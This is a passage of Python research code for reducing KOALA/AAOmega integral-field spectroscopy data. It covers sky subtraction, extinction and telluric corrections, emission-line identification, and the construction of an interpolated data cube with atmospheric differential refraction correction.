# (1) If a single sky_spectrum is provided:
if sky_method == "1D":
if sky_spectrum[0] != 0:
print("\n> Sustracting the sky using the sky spectrum provided, checking the scale OBJ/SKY...")
if scale_sky_1D == 0:
self.sky_emission = scale_sky_spectrum(
self.wavelength,
sky_spectrum,
self.intensity_corrected,
cut_sky=cut_sky,
fmax=fmax,
fmin=fmin,
fibre_list=fibre_list,
)
else:
self.sky_emission = sky_spectrum * scale_sky_1D
print(" As requested, we scale the given 1D spectrum by {}".format(scale_sky_1D))
if individual_sky_substraction:
print("\n As requested, performing individual sky substraction in each fibre...")
else:
print("\n Substracting sky to all fibres using scaled sky spectrum provided...")
# For blue spectra, remove 5578 in the sky spectrum...
if self.valid_wave_min < 5578:
resultado = fluxes(
self.wavelength,
self.sky_emission,
5578,
plot=False,
verbose=False,
) # fmin=-5.0E-17, fmax=2.0E-16,
# resultado = [rms_cont, fit[0], fit_error[0], gaussian_flux, gaussian_flux_error, fwhm, fwhm_error, flux, flux_error, ew, ew_error, spectrum ]
self.sky_emission = resultado[11]
for i in range(self.n_spectra):
# Clean 5578 if needed in RSS data
if self.valid_wave_min < 5578:
resultado = fluxes(
self.wavelength,
self.intensity_corrected[i],
5578,
plot=False,
verbose=False,
) # fmin=-5.0E-17, fmax=2.0E-16,
# resultado = [rms_cont, fit[0], fit_error[0], gaussian_flux, gaussian_flux_error, fwhm, fwhm_error, flux, flux_error, ew, ew_error, spectrum ]
self.intensity_corrected[i] = resultado[11]
if individual_sky_substraction:
# Do this INDIVIDUALLY for each fibre
if i == 100:
print(" Substracting sky in fibre 100...")
if i == 200:
print(" Substracting sky in fibre 200...")
if i == 300:
print(" Substracting sky in fibre 300...")
if i == 400:
print(" Substracting sky in fibre 400...")
if i == 500:
print(" Substracting sky in fibre 500...")
if i == 600:
print(" Substracting sky in fibre 600...")
if i == 700:
print(" Substracting sky in fibre 700...")
if i == 800:
print(" Substracting sky in fibre 800...")
if i == 900:
print(" Substracting sky in fibre 900...")
sky_emission = scale_sky_spectrum(
self.wavelength,
sky_spectrum,
self.intensity_corrected,
cut_sky=cut_sky,
fmax=fmax,
fmin=fmin,
fibre_list=[i],
verbose=False,
plot=False,
warnings=False,
)
self.intensity_corrected[i, :] = (
self.intensity_corrected[i, :] - sky_emission
) # sky_spectrum * self.exptime/sky_exptime
else:
self.intensity_corrected[i, :] = (
self.intensity_corrected[i, :] - self.sky_emission
) # sky_spectrum * self.exptime/sky_exptime
if plot:
plt.figure(figsize=(fig_size, fig_size / 2.5))
plt.plot(self.wavelength, sky_spectrum)
plt.minorticks_on()
plt.axvline(x=self.valid_wave_min, color="k", linestyle="--")
plt.axvline(x=self.valid_wave_max, color="k", linestyle="--")
plt.xlim(self.wavelength[0] - 10, self.wavelength[-1] + 10)
plt.title("Sky spectrum provided (Scaled)")
plt.xlabel("Wavelength [$\AA$]")
# plt.show()
# plt.close()
print(" Intensities corrected for sky emission and stored in self.intensity_corrected !")
self.sky_emission = sky_spectrum
else:
print("\n> Sustracting the sky using the sky spectrum requested but any sky spectrum provided !")
sky_method = "self"
n_sky = 50
# (2) If a 2D sky, sky_rss, is provided
if sky_method == "2D": # if np.nanmedian(sky_rss.intensity_corrected) != 0:
if scale_sky_rss != 0:
print("\n> Using sky image provided to substract sky, considering a scale of", scale_sky_rss, "...")
self.sky_emission = scale_sky_rss * sky_rss.intensity_corrected
self.intensity_corrected = (
self.intensity_corrected - self.sky_emission
)
else:
print("\n> Using sky image provided to substract sky, computing the scale using sky lines")
# check scale fibre by fibre
self.sky_emission = copy.deepcopy(sky_rss.intensity_corrected)
scale_per_fibre = np.ones((self.n_spectra))
scale_per_fibre_2 = np.ones((self.n_spectra))
lowlow = 15
lowhigh = 5
highlow = 5
highhigh = 15
if self.grating == "580V":
print(" For 580V we use bright skyline at 5578 AA ...")
sky_line = 5578
sky_line_2 = 0
if self.grating == "1000R":
# print " For 1000R we use skylines at 6300.5 and 6949.0 AA ..." ### TWO LINES GIVE WORSE RESULTS THAN USING ONLY 1...
print(" For 1000R we use skyline at 6949.0 AA ...")
sky_line = 6949.0 # 6300.5
lowlow = 22 # for getting a good continuuem in 6949.0
lowhigh = 12
highlow = 36
highhigh = 52
sky_line_2 = 0 # 6949.0 #7276.5 fails
lowlow_2 = 22 # for getting a good continuuem in 6949.0
lowhigh_2 = 12
highlow_2 = 36
highhigh_2 = 52
if sky_line_2 != 0:
print(" ... first checking {} ...".format(sky_line))
for fibre_sky in range(self.n_spectra):
skyline_spec = fluxes(
self.wavelength,
self.intensity_corrected[fibre_sky],
sky_line,
plot=False,
verbose=False,
lowlow=lowlow,
lowhigh=lowhigh,
highlow=highlow,
highhigh=highhigh,
) # fmin=-5.0E-17, fmax=2.0E-16,
# resultado = [rms_cont, fit[0], fit_error[0], gaussian_flux, gaussian_flux_error, fwhm, fwhm_error, flux, flux_error, ew, ew_error, spectrum ]
self.intensity_corrected[fibre_sky] = skyline_spec[11]
skyline_sky = fluxes(
self.wavelength,
self.sky_emission[fibre_sky],
sky_line,
plot=False,
verbose=False,
lowlow=lowlow,
lowhigh=lowhigh,
highlow=highlow,
highhigh=highhigh,
) # fmin=-5.0E-17, fmax=2.0E-16,
scale_per_fibre[fibre_sky] = old_div(skyline_spec[3], skyline_sky[3]) # TODO: get data for 2D and test if can remove
self.sky_emission[fibre_sky] = skyline_sky[11]
if sky_line_2 != 0:
print(" ... now checking {} ...".format(sky_line_2))
for fibre_sky in range(self.n_spectra):
skyline_spec = fluxes(
self.wavelength,
self.intensity_corrected[fibre_sky],
sky_line_2,
plot=False,
verbose=False,
lowlow=lowlow_2,
lowhigh=lowhigh_2,
highlow=highlow_2,
highhigh=highhigh_2,
) # fmin=-5.0E-17, fmax=2.0E-16,
# resultado = [rms_cont, fit[0], fit_error[0], gaussian_flux, gaussian_flux_error, fwhm, fwhm_error, flux, flux_error, ew, ew_error, spectrum ]
self.intensity_corrected[fibre_sky] = skyline_spec[11]
skyline_sky = fluxes(
self.wavelength,
self.sky_emission[fibre_sky],
sky_line_2,
plot=False,
verbose=False,
lowlow=lowlow_2,
lowhigh=lowhigh_2,
highlow=highlow_2,
highhigh=highhigh_2,
) # fmin=-5.0E-17, fmax=2.0E-16,
scale_per_fibre_2[fibre_sky] = (
old_div(skyline_spec[3], skyline_sky[3]) # TODO: get data for 2D and test if can remove
)
self.sky_emission[fibre_sky] = skyline_sky[11]
# Median value of scale_per_fibre, and apply that value to all fibres
if sky_line_2 == 0:
scale_sky_rss = np.nanmedian(scale_per_fibre)
self.sky_emission = self.sky_emission * scale_sky_rss
else:
scale_sky_rss = np.nanmedian(
old_div((scale_per_fibre + scale_per_fibre_2), 2) # TODO: get data for 2D and test if can remove
)
# Make linear fit
scale_sky_rss_1 = np.nanmedian(scale_per_fibre)
scale_sky_rss_2 = np.nanmedian(scale_per_fibre_2)
print(
" Median scale for line 1 : {} range [ {}, {} ]]".format(
scale_sky_rss_1, np.nanmin(scale_per_fibre), np.nanmax(scale_per_fibre)
)
)
print(
" Median scale for line 2 : {} range [ {}, {} ]]".format(
scale_sky_rss_2, np.nanmin(scale_per_fibre_2), np.nanmax(scale_per_fibre_2)
)
)
b = old_div((scale_sky_rss_1 - scale_sky_rss_2), (
sky_line - sky_line_2 # TODO: get data for 2D and test if can remove
))
a = scale_sky_rss_1 - b * sky_line
# ,a+b*sky_line,a+b*sky_line_2
print(" Appling linear fit with a = {} b = {} to all fibres in sky image...".format(a, b))
for i in range(self.n_wave):
self.sky_emission[:, i] = self.sky_emission[:, i] * (
a + b * self.wavelength[i]
)
if plot:
plt.figure(figsize=(fig_size, fig_size / 2.5))
label1 = "$\lambda$" + np.str(sky_line)
plt.plot(scale_per_fibre, alpha=0.5, label=label1)
plt.minorticks_on()
plt.ylim(np.nanmin(scale_per_fibre), np.nanmax(scale_per_fibre))
plt.axhline(y=scale_sky_rss, color="k", linestyle="--")
if sky_line_2 == 0:
text = (
"Scale OBJECT / SKY using sky line $\lambda$ {}".format(sky_line))
print(" Scale per fibre in the range [{} , {} ], median value is {}".format(np.nanmin(scale_per_fibre), np.nanmax(scale_per_fibre), scale_sky_rss))
print(" Using median value to scale sky emission provided...")
if sky_line_2 != 0:
text = (
"Scale OBJECT / SKY using sky lines $\lambda$ {} and $\lambda$".format(sky_line, sky_line_2))
label2 = "$\lambda$ {}".format(sky_line_2)
plt.plot(scale_per_fibre_2, alpha=0.5, label=label2)
plt.axhline(y=scale_sky_rss_1, color="k", linestyle=":")
plt.axhline(y=scale_sky_rss_2, color="k", linestyle=":")
plt.legend(frameon=False, loc=1, ncol=2)
plt.title(text)
plt.xlabel("Fibre")
# plt.show()
# plt.close()
self.intensity_corrected = (
self.intensity_corrected - self.sky_emission
)
# (3) No sky spectrum or image is provided, obtain the sky using the n_sky lowest fibres
if sky_method == "self":
print("\n Using {} lowest intensity fibres to create a sky...".format(n_sky))
self.find_sky_emission(
n_sky=n_sky,
plot=plot,
sky_fibres=sky_fibres,
sky_wave_min=sky_wave_min,
sky_wave_max=sky_wave_max,
)
# print "\n AFTER SKY SUBSTRACTION:"
# self.compute_integrated_fibre(plot=False, warnings=warnings) #title =" - Throughput corrected", text="after throughput correction..."
# count_negative = 0
# for i in range(self.n_spectra):
# if self.integrated_fibre[i] < 0.11 :
# #print " Fibre ",i," has an integrated flux of ", self.integrated_fibre[i]
# count_negative=count_negative+1
# print self.integrated_fibre
# print " Number of fibres with NEGATIVE integrated value AFTER SKY SUBSTRACTION = ", count_negative
# If this RSS is an offset sky, perform a median filter to increase S/N
if is_sky:
print("\n> This RSS file is defined as SKY... applying median filter with window {} ...".format(win_sky))
medfilt_sky = median_filter(
self.intensity_corrected, self.n_spectra, self.n_wave, win_sky=win_sky
)
self.intensity_corrected = copy.deepcopy(medfilt_sky)
print(" Median filter applied, results stored in self.intensity_corrected !")
# Get airmass and correct for extinction AFTER SKY SUBTRACTION
ZD = (self.ZDSTART + self.ZDEND)/2
self.airmass = 1/np.cos(np.radians(ZD))
self.extinction_correction = np.ones(self.n_wave)
if do_extinction:
self.do_extinction_curve(pth.join(DATA_PATH, "ssoextinct.dat"), plot=plot)
# Check if telluric correction is needed & apply
if telluric_correction[0] != 0:
plot_integrated_fibre_again = plot_integrated_fibre_again + 1
print("\n> Applying telluric correction...")
if plot:
plt.figure(figsize=(fig_size, fig_size / 2.5))
plt.plot(self.wavelength, telluric_correction)
plt.minorticks_on()
plt.axvline(x=self.valid_wave_min, color="k", linestyle="--")
plt.axvline(x=self.valid_wave_max, color="k", linestyle="--")
plt.xlim(self.wavelength[0] - 10, self.wavelength[-1] + 10)
plt.ylim(0.9, 2)
plt.title("Telluric correction")
plt.xlabel("Wavelength [$\AA$]")
# plt.show()
# plt.close()
if plot:
integrated_intensity_sorted = np.argsort(self.integrated_fibre)
region = [
integrated_intensity_sorted[-1],
integrated_intensity_sorted[0],
]
print(" Example of telluric correction using fibres {} and {} :".format(region[0], region[1]))
plt.figure(figsize=(fig_size, fig_size / 2.5))
plt.plot(
self.wavelength,
self.intensity_corrected[region[0]],
color="r",
alpha=0.3,
)
plt.plot(
self.wavelength,
self.intensity_corrected[region[1]],
color="r",
alpha=0.3,
)
for i in range(self.n_spectra):
self.intensity_corrected[i, :] = (
self.intensity_corrected[i, :] * telluric_correction
)
if plot:
plt.plot(
self.wavelength,
self.intensity_corrected[region[0]],
color="b",
alpha=0.5,
)
plt.plot(
self.wavelength,
self.intensity_corrected[region[1]],
color="g",
alpha=0.5,
)
plt.minorticks_on()
plt.axvline(x=self.valid_wave_min, color="k", linestyle="--")
plt.axvline(x=self.valid_wave_max, color="k", linestyle="--")
plt.xlim(self.wavelength[0] - 10, self.wavelength[-1] + 10)
plt.ylim(
np.nanmin(self.intensity_corrected[region[1]]),
np.nanmax(self.intensity_corrected[region[0]]),
) # CHECK THIS AUTOMATICALLY
plt.xlabel("Wavelength [$\AA$]")
# plt.show()
# plt.close()
# Check if identify emission lines is requested & do
if id_el:
if brightest_line_wavelength == 0:
self.el = self.identify_el(
high_fibres=high_fibres,
brightest_line=brightest_line,
cut=cut,
verbose=True,
plot=plot_id_el,
fibre=0,
broad=broad,
)
print("\n Emission lines identified saved in self.el !!")
else:
brightest_line_rest_wave = 6562.82
print("\n As given, line {} at rest wavelength = {} is at {}".format(brightest_line, brightest_line_rest_wave, brightest_line_wavelength))
self.el = [
[brightest_line],
[brightest_line_rest_wave],
[brightest_line_wavelength],
[7.2],
]
# PUTAAA sel.el=[peaks_name,peaks_rest, p_peaks_l, p_peaks_fwhm]
else:
self.el = [[0], [0], [0], [0]]
# Check if id_list provided
if id_list[0] != 0:
if id_el:
print("\n> Checking if identified emission lines agree with list provided")
# Read list with all emission lines to get the name of emission lines
emission_line_file = "data/lineas_c89_python.dat"
el_center, el_name = read_table(emission_line_file, ["f", "s"])
# Find brightest line to get redshift
for i in range(len(self.el[0])):
if self.el[0][i] == brightest_line:
obs_wave = self.el[2][i]
redshift = (self.el[2][i] - self.el[1][i])/self.el[1][i]
print(" Brightest emission line {} foud at {} , redshift = {}".format(brightest_line, obs_wave, redshift))
el_identified = [[], [], [], []]
n_identified = 0
for line in id_list:
id_check = 0
for i in range(len(self.el[1])):
if line == self.el[1][i]:
if verbose:
print(" Emission line {} {} has been identified".format(self.el[0][i], self.el[1][i]))
n_identified = n_identified + 1
id_check = 1
el_identified[0].append(self.el[0][i]) # Name
el_identified[1].append(self.el[1][i]) # Central wavelength
el_identified[2].append(
self.el[2][i]
) # Observed wavelength
el_identified[3].append(self.el[3][i]) # "FWHM"
if id_check == 0:
for i in range(len(el_center)):
if line == el_center[i]:
el_identified[0].append(el_name[i])
print(" Emission line {} {} has NOT been identified, adding...".format(el_name[i], line))
el_identified[1].append(line)
el_identified[2].append(line * (redshift + 1))
el_identified[3].append(4 * broad)
self.el = el_identified
print(" Number of emission lines identified = {} of a total of {} provided. self.el updated accordingly".format(n_identified, len(id_list)))
else:
print("\n> List of emission lines provided but no identification was requested")
# Clean sky residuals if requested
if clean_sky_residuals:
plot_integrated_fibre_again = plot_integrated_fibre_again + 1
self.clean_sky_residuals(
extra_w=extra_w,
step=step_csr,
dclip=dclip,
verbose=verbose,
fibre=fibre,
wave_min=valid_wave_min,
wave_max=valid_wave_max,
)
# set_data was till here... -------------------------------------------------------------------
if fibre != 0:
plot_integrated_fibre_again = 0
# Plot corrected values
if plot == True and rss_clean == False: # plot_integrated_fibre_again > 0 :
self.compute_integrated_fibre(
plot=plot,
title=" - Intensities Corrected",
warnings=warnings,
text="after all corrections have been applied...",
valid_wave_min=valid_wave_min,
valid_wave_max=valid_wave_max,
correct_negative_sky=correct_negative_sky,
)
integrated_intensity_sorted = np.argsort(self.integrated_fibre)
region = []
for fibre_ in range(high_fibres):
region.append(integrated_intensity_sorted[-1 - fibre_])
print("\n> Checking results using {} fibres with the highest integrated intensity".format(high_fibres))
print(" which are : {}".format(region))
plt.figure(figsize=(fig_size, fig_size / 2.5))
I = np.nansum(self.intensity[region], axis=0)
plt.plot(self.wavelength, I, "r-", label="Uncorrected", alpha=0.3)
Ic = np.nansum(self.intensity_corrected[region], axis=0)
plt.axhline(y=0, color="k", linestyle=":")
plt.plot(self.wavelength, Ic, "g-", label="Corrected", alpha=0.4)
plt.ylabel("Flux")
plt.xlabel("Wavelength [$\AA$]")
plt.minorticks_on()
plt.xlim(self.wavelength[0] - 10, self.wavelength[-1] + 10)
plt.axvline(x=self.valid_wave_min, color="k", linestyle="--")
plt.axvline(x=self.valid_wave_max, color="k", linestyle="--")
yy1 = np.nanpercentile(Ic, 0)
yy2 = np.nanpercentile(Ic, 99)
rango = yy2 - yy1
plt.ylim(yy1 - rango * 0.05, yy2)
plt.title("{} - Combined spectrum - {} fibres with highest intensity".format(self.object, high_fibres))
plt.legend(frameon=False, loc=4, ncol=2)
# plt.show()
# plt.close()
region = []
for fibre_ in range(high_fibres):
region.append(integrated_intensity_sorted[fibre_])
print("\n> Checking results using {} fibres with the lowest integrated intensity".format(high_fibres))
print(" which are : {}".format(region))
plt.figure(figsize=(fig_size, fig_size / 2.5))
I = np.nansum(self.intensity[region], axis=0)
plt.plot(self.wavelength, I, "r-", label="Uncorrected", alpha=0.3)
Ic = np.nansum(self.intensity_corrected[region], axis=0)
I_ymin = np.nanmin([np.nanmin(I), np.nanmin(Ic)])
I_ymax = np.nanmax([np.nanmax(I), np.nanmax(Ic)])
I_med = np.nanmedian(Ic)
I_rango = I_ymax - I_ymin
plt.axhline(y=0, color="k", linestyle=":")
plt.plot(self.wavelength, Ic, "g-", label="Corrected", alpha=0.4)
plt.ylabel("Flux")
plt.xlabel("Wavelength [$\AA$]")
plt.minorticks_on()
plt.xlim(self.wavelength[0] - 10, self.wavelength[-1] + 10)
plt.axvline(x=self.valid_wave_min, color="k", linestyle="--")
plt.axvline(x=self.valid_wave_max, color="k", linestyle="--")
# plt.ylim([I_ymin-I_rango/18,I_ymax-I_rango*0.65])
plt.ylim([I_med - I_rango * 0.65, I_med + I_rango * 0.65])
plt.title("{} - Combined spectrum - {} fibres with lowest intensity".format(self.object, high_fibres))
plt.legend(frameon=False, loc=4, ncol=2)
# plt.show()
# plt.close()
# Plot RSS_image
if plot:
self.RSS_image()
if rss_clean:
self.RSS_image()
# Print summary and information from header
print("\n> Summary of reading rss file ''{}'' :".format(filename))
print("\n This is a KOALA '{}' file, using grating '{}' in AAOmega".format(AAOmega_Arm, self.grating))
print(" Object: {}".format(self.object))
print(" Field of view: {} (spaxel size = {} arcsec)".format(field, self.spaxel_size))
print(" Center position: (RA, DEC) = ({:.3f}, {:.3f}) degrees".format(
self.RA_centre_deg, self.DEC_centre_deg
))
print(" Field covered [arcsec] = {:.1f} x {:.1f}".format(
self.RA_segment + self.spaxel_size, self.DEC_segment + self.spaxel_size
))
print(" Position angle (PA) = {:.1f} degrees".format(self.PA))
print(" ")
if rss_clean:
print(" This was a CLEAN RSS file, no correction was applied!")
print(" Values stored in self.intensity_corrected are the same that those in self.intensity")
else:
if flat != "":
print(" Intensities divided by the given flatfield")
if apply_throughput:
print(" Intensities corrected for throughput !")
else:
print(" Intensities NOT corrected for throughput")
if correct_ccd_defects == True and correct_high_cosmics == True:
print(" Intensities corrected for high cosmics and CCD defects !")
if correct_ccd_defects == True and correct_high_cosmics == False:
print(" Intensities corrected for CCD defects (but NOT for high cosmics) !")
if correct_ccd_defects == False and correct_high_cosmics == False:
print(" Intensities NOT corrected for high cosmics and CCD defects")
if sol[0] != 0:
print(" All fibres corrected for small wavelength shifts using wavelength solution provided!")
else:
if fix_wavelengths:
print(" Wavelengths corrected for small shifts using Gaussian fit to selected bright skylines in all fibres!")
else:
print(" Wavelengths NOT corrected for small shifts")
if is_sky:
print(" This is a SKY IMAGE, median filter with window {} applied !".format(win_sky))
else:
if sky_method == "none":
print(" Intensities NOT corrected for sky emission")
if sky_method == "self":
print(" Intensities corrected for sky emission using {} spaxels with lowest values !".format(n_sky))
if sky_method == "1D":
print(" Intensities corrected for sky emission using (scaled) spectrum provided ! ")
if sky_method == "1Dfit":
print(" Intensities corrected for sky emission fitting Gaussians to both 1D sky spectrum and each fibre ! ")
if sky_method == "2D":
print(" Intensities corrected for sky emission using sky image provided scaled by {} !".format(scale_sky_rss))
if telluric_correction[0] != 0:
print(" Intensities corrected for telluric absorptions !")
else:
print(" Intensities NOT corrected for telluric absorptions")
if do_extinction:
print(" Intensities corrected for extinction !")
else:
print(" Intensities NOT corrected for extinction")
if correct_negative_sky:
print(" Intensities CORRECTED (if needed) for negative integrate flux values!")
if id_el:
print(" ", len(
self.el[0]
), "emission lines identified and stored in self.el !")
print(" ", self.el[0])
if clean_sky_residuals == True and fibre == 0:
print(" Intensities cleaned for sky residuals !")
if clean_sky_residuals == True and fibre != 0:
print(" Only fibre {} has been corrected for sky residuals".format(fibre))
if clean_sky_residuals == False:
print(" Intensities NOT corrected for sky residuals")
print(" All applied corrections are stored in self.intensity_corrected !")
if save_rss_to_fits_file != "":
save_rss_fits(self, fits_file=save_rss_to_fits_file)
print("\n> KOALA RSS file read !")
# -----------------------------------------------------------------------------
# INTERPOLATED CUBE CLASS
# -----------------------------------------------------------------------------
class Interpolated_cube(object): # TASK_Interpolated_cube
"""
Constructs a cube by accumulating RSS with given offsets.
"""
# -----------------------------------------------------------------------------
def __init__(
self,
RSS,
pixel_size_arcsec,
kernel_size_arcsec,
centre_deg=[],
size_arcsec=[],
aligned_coor=False,
plot=False,
flux_calibration=[0],
zeros=False,
ADR=False,
force_ADR=False,
offsets_files="",
offsets_files_position="",
shape=[],
rss_file="",
warnings=False,
): # Angel added aligned_coor 6 Sep, flux_calibration, zeros 27 Oct;
# added ADR 28 Feb offsets_files, shape for defining shape of cube
# warnings (when cubing) added 13 Jan 2019
"""
Parameters
----------
RSS
pixel_size_arcsec
kernel_size_arcsec
centre_deg
size_arcsec
aligned_coor
plot
flux_calibration
zeros
ADR
force_ADR
offsets_files
offsets_files_position
shape
rss_file
warnings
"""
self.RSS = RSS
self.n_wave = RSS.n_wave
self.pixel_size_arcsec = pixel_size_arcsec
self.kernel_size_arcsec = kernel_size_arcsec
self.kernel_size_pixels = (
float(kernel_size_arcsec/pixel_size_arcsec)
) # must be a float number!
self.wavelength = RSS.wavelength
self.description = RSS.description + " - CUBE"
self.object = RSS.object
self.PA = RSS.PA
self.grating = RSS.grating
self.CRVAL1_CDELT1_CRPIX1 = RSS.CRVAL1_CDELT1_CRPIX1
self.total_exptime = RSS.exptime
self.rss_list = RSS.rss_list
self.RA_segment = RSS.RA_segment
self.offsets_files = offsets_files # Offsets between files when align cubes
self.offsets_files_position = (
offsets_files_position # Position of this cube when aligning
)
self.valid_wave_min = RSS.valid_wave_min
self.valid_wave_max = RSS.valid_wave_max
self.seeing = 0.0
self.flux_cal_step = 0.0
self.flux_cal_min_wave = 0.0
self.flux_cal_max_wave = 0.0
if zeros:
print("\n> Creating empty cube using information provided in rss file: ")
print(" {}".format(self.description))
else:
print("\n> Creating cube from file rss file: {}".format(self.description))
print(" Pixel size = {} arcsec".format(self.pixel_size_arcsec))
print(" kernel size = {} arcsec".format(self.kernel_size_arcsec))
# centre_deg = [RA,DEC] if we need to give new RA, DEC centre
if len(centre_deg) == 2:
self.RA_centre_deg = centre_deg[0]
self.DEC_centre_deg = centre_deg[1]
else:
self.RA_centre_deg = RSS.RA_centre_deg
self.DEC_centre_deg = RSS.DEC_centre_deg
if aligned_coor == True:
self.xoffset_centre_arcsec = (
self.RA_centre_deg - RSS.ALIGNED_RA_centre_deg
) * 3600.0
self.yoffset_centre_arcsec = (
self.DEC_centre_deg - RSS.ALIGNED_DEC_centre_deg
) * 3600.0
print(self.RA_centre_deg)
print(RSS.ALIGNED_RA_centre_deg)
print((self.RA_centre_deg - RSS.ALIGNED_RA_centre_deg) * 3600.0)
print("\n\n\n\n")
if zeros == False:
print(" Using ALIGNED coordenates for centering cube...")
else:
self.xoffset_centre_arcsec = (
self.RA_centre_deg - RSS.RA_centre_deg
) * 3600.0
self.yoffset_centre_arcsec = (
self.DEC_centre_deg - RSS.DEC_centre_deg
) * 3600.0
if len(size_arcsec) == 2:
self.n_cols = np.int((size_arcsec[0]/self.pixel_size_arcsec)) + 2 * np.int(
(self.kernel_size_arcsec/self.pixel_size_arcsec)
)
self.n_rows = np.int((size_arcsec[1]/self.pixel_size_arcsec)) + 2 * np.int(
(self.kernel_size_arcsec/self.pixel_size_arcsec)
)
else:
self.n_cols = (
2
* (
np.int(
(np.nanmax(
np.abs(RSS.offset_RA_arcsec - self.xoffset_centre_arcsec)
)/self.pixel_size_arcsec)
)
+ np.int(self.kernel_size_pixels)
)
+ 3
) # -3 ### +1 added by Angel 25 Feb 2018 to put center in center
self.n_rows = (
2
* (
np.int(
(np.nanmax(
np.abs(RSS.offset_DEC_arcsec - self.yoffset_centre_arcsec)
)/self.pixel_size_arcsec)
)
+ np.int(self.kernel_size_pixels)
)
+ 3
) # -3 ### +1 added by Angel 25 Feb 2018 to put center in center
if self.n_cols % 2 != 0:
self.n_cols += 1 # Even numbers to have [0,0] in the centre
if self.n_rows % 2 != 0:
self.n_rows += 1
# If we define a specific shape
if len(shape) == 2:
self.n_rows = shape[0]
self.n_cols = shape[1]
# Define zeros
self._weighted_I = np.zeros((self.n_wave, self.n_rows, self.n_cols))
self._weight = np.zeros_like(self._weighted_I)
self.flux_calibration = np.zeros(self.n_wave)
# self.offset_from_center_x_arcsec = 0.
# self.offset_from_center_y_arcsec = 0.
if zeros:
self.data = np.zeros_like(self._weighted_I)
else:
print("\n Smooth cube, (RA, DEC)_centre = ({}, {}) degree".format(
self.RA_centre_deg, self.DEC_centre_deg
))
print(" Size = {} columns (RA) x {} rows (DEC); {:.2f} x {:.2f} arcsec".format(
self.n_cols,
self.n_rows,
(self.n_cols + 1) * pixel_size_arcsec,
(self.n_rows + 1) * pixel_size_arcsec,
))
sys.stdout.write(" Adding {} spectra... ".format(RSS.n_spectra))
sys.stdout.flush()
output_every_few = np.sqrt(RSS.n_spectra) + 1
next_output = -1
for i in range(RSS.n_spectra):
if i > next_output:
sys.stdout.write("\b" * 6)
sys.stdout.write("{:5.2f}%".format(i * 100.0 / RSS.n_spectra))
sys.stdout.flush()
next_output = i + output_every_few
offset_rows = ((
RSS.offset_DEC_arcsec[i] - self.yoffset_centre_arcsec
)/pixel_size_arcsec)
offset_cols = ((
-RSS.offset_RA_arcsec[i] + self.xoffset_centre_arcsec
)/pixel_size_arcsec)
corrected_intensity = RSS.intensity_corrected[i]
self.add_spectrum(
corrected_intensity, offset_rows, offset_cols, warnings=warnings
)
self.data = self._weighted_I/self._weight
self.trace_peak(plot=plot)
# Check flux calibration
if np.nanmedian(flux_calibration) == 0:
fcal = False
else:
self.flux_calibration = flux_calibration
fcal = True
# This should be in 1 line of step of loop, I couldn't get it # Yago HELP !!
for x in range(self.n_rows):
for y in range(self.n_cols):
self.data[:, x, y] = (
(((self.data[:, x, y]/self.flux_calibration)/1e16)/self.RSS.exptime)
)
# plt.plot(self.wavelength,self.data[:,x,y]) #
# ylabel="Flux [ erg cm$^{-2}$ s$^{-1}$ A$^{-1}$]"
# Correct for Atmospheric Differential Refraction (ADR) if requested
if ADR:
self.ADR_correction(plot=plot, force_ADR=force_ADR)
else:
print("\n> Data NO corrected for Atmospheric Differential Refraction (ADR).")
# Get integrated maps (all waves and valid range), locate peaks, plots
self.get_integrated_map_and_plot(plot=plot, fcal=fcal)
# For calibration stars, we get an integrated star flux and a seeing
self.integrated_star_flux = np.zeros_like(self.wavelength)
if fcal:
print("\n> Absolute flux calibration included in this interpolated cube.")
else:
print("\n> This interpolated cube does not include an absolute flux calibration.")
print("> Interpolated cube done!\n")
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def ADR_correction(self, plot=True, force_ADR=False):
"""
Correct for Atmospheric Diferential Refraction (ADR)
Parameters
----------
plot
force_ADR
Returns
-------
"""
self.data_ADR = copy.deepcopy(self.data)
do_ADR = True
# First we check if it is needed (unless forced)...
if (
self.ADR_x_max < self.pixel_size_arcsec/2
and self.ADR_y_max < self.pixel_size_arcsec/2
):
print("\n> Atmospheric Differential Refraction (ADR) correction is NOT needed.")
print(" The computed max ADR values ({:.2f},{:.2f}) are smaller than half the pixel size of {:.2f} arcsec".format(
self.ADR_x_max, self.ADR_y_max, self.pixel_size_arcsec
))
do_ADR = False
if force_ADR:
print(' However we proceed to do the ADR correction as indicated: "force_ADR = True" ...')
do_ADR = True
if do_ADR:
print("\n> Correcting for Atmospheric Differential Refraction (ADR)...")
sys.stdout.flush()
output_every_few = np.sqrt(self.n_wave) + 1
next_output = -1
for l in range(self.n_wave):
if l > next_output:
sys.stdout.write("\b" * 36)
sys.stdout.write(
" Moving plane {:5}/{:5}... {:5.2f}%".format(
l, self.n_wave, l * 100.0 / self.n_wave
)
)
sys.stdout.flush()
next_output = l + output_every_few
tmp = copy.deepcopy(self.data_ADR[l, :, :])
mask = copy.deepcopy(tmp) * 0.0
mask[np.where(np.isnan(tmp))] = 1 # make mask where Nans are
kernel = Gaussian2DKernel(5)
tmp_nonan = interpolate_replace_nans(tmp, kernel)
# need to see if there are still nans. This can happen in the padded parts of the grid
# where the kernel is not large enough to cover the regions with NaNs.
if np.isnan(np.sum(tmp_nonan)):
tmp_nonan = np.nan_to_num(tmp_nonan)
tmp_shift = shift(
tmp_nonan,
[
(-2 * self.ADR_y[l]/self.pixel_size_arcsec),
(-2 * self.ADR_x[l]/self.pixel_size_arcsec),
],
cval=np.nan,
)
mask_shift = shift(
mask,
[
(-2 * self.ADR_y[l]/self.pixel_size_arcsec),
(-2 * self.ADR_x[l]/self.pixel_size_arcsec),
],
cval=np.nan,
)
tmp_shift[mask_shift > 0.5] = np.nan
self.data_ADR[l, :, :] = copy.deepcopy(tmp_shift)
# print(l,tmp.shape,2*self.ADR_y[l],2*self.ADR_x[l],np.sum(tmp_nonan),np.sum(tmp),np.sum(tmp_shift))
# for y in range(self.n_rows):
# for x in range(self.n_cols):
# # mal = 0
# if np.int(np.round(x+2*self.ADR_x[l]/self.pixel_size_arcsec)) < self.n_cols :
# if np.int(np.round(y+2*self.ADR_y[l]/self.pixel_size_arcsec)) < self.n_rows :
# # print self.data.shape,x,"->",np.int(np.round(x+self.ADR_x[i]/self.pixel_size_arcsec))," ",y,"->",np.int(np.round(y+self.ADR_y[i]/self.pixel_size_arcsec))
# self.data_ADR[l,y,x]=self.data[l, np.int(np.round(y+2*self.ADR_y[l]/self.pixel_size_arcsec )), np.int(np.round(x+2*self.ADR_x[l]/self.pixel_size_arcsec)) ]
# else: mal = 1
# else: mal = 1
# if mal == 1:
